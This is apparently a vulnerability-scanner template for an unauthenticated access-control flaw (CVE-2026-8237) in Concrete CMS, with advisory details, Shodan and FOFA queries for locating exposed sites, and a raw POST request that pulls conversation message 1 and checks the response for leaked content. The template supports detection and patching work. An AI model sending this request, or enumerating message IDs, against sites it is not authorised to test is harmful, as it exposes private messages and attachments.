Description
Concrete CMS <= 9.5.0 contains an IDOR caused by insufficient access control in /ccm/frontend/conversations/message_detail endpoint, letting unauthenticated attackers enumerate conversation messages and attachments.
Concrete CMS <= 9.5.0 contains an IDOR caused by insufficient access control in /ccm/frontend/conversations/message_detail endpoint, letting unauthenticated attackers enumerate conversation messages and attachments.
id: CVE-2026-8237
info:
name: Concrete CMS <= 9.5.0 - Unauthenticated Conversation Message Disclosure (IDOR)
author: Pauullamm
severity: medium
description: |
Concrete CMS <= 9.5.0 contains an IDOR caused by insufficient access control in /ccm/frontend/conversations/message_detail endpoint, letting unauthenticated attackers enumerate conversation messages and attachments.
impact: |
Unauthenticated attackers can access restricted conversation messages and file attachments, exposing sensitive information.
remediation: |
Update to a version later than 9.5.0 or the latest available version
reference:
- https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
- https://github.com/advisories/GHSA-xpgc-7vc2-8725
- https://nvd.nist.gov/vuln/detail/CVE-2026-8237
classification:
cve-id: CVE-2026-8237
cwe-id: CWE-862
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
epss-score: 0.0064
epss-percentile: 0.48983
cpe: cpe:2.3:a:concretecms:concrete_cms:*:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: concretecms
product: concrete_cms
shodan-query: http.html:"concrete5"
fofa-query: body="concrete5" || body="concretecms"
tags: cve,cve2026,concretecms,concrete5,idor,exposure
http:
- raw:
- |
POST /ccm/frontend/conversations/message_detail HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cnvMessageID=1
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "data-conversation-message-id=\"1\"", "ccm-conversation-message-body")'
- 'contains_any(body, "ccm-conversation-message-username", "ccm-conversation-message-pending-notice")'
condition: and
# digest: 4b0a00483046022100b0c25e472ff302567b72f546861d41d0f407d3f14dc782ed0e3a3805b7e3fd44022100829fa416741f8dd86bbc12f21a9454d2e1bc08c9ec2545a2e8398c0e40272a5c:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.